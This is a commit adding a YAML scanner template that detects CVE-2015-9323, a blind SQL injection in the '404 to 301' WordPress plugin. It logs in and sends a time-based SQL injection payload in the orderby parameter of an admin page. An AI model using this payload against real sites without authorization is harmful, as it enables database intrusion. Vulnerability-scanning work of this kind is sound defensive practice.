Merge pull request #7927 from harsh2403/CVE-2015-9323

Create CVE-2015-9323.yaml
2023-08-16 11:36:31 +05:30 · 2023-08-16 11:36:31 +05:30 · 2dbbc20a53
parent 5d6d00a53e e42ab01dbf
commit 2dbbc20a53
1 changed files with 44 additions and 0 deletions
--- a/http/cves/CVE-2015-9323.yaml
+++ b/http/cves/CVE-2015-9323.yaml
@ -0,0 +1,44 @@
+id: CVE-2015-9323
+
+info:
+  name: 404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
+  author: Harsh
+  severity: critical
+  description: |
+   The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
+  remediation: Fixed in version 2.0.3
+  reference:
+    - https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9
+    - http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 2
+  tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        @timeout: 15s
+        GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "404-to-301")'
+        condition: and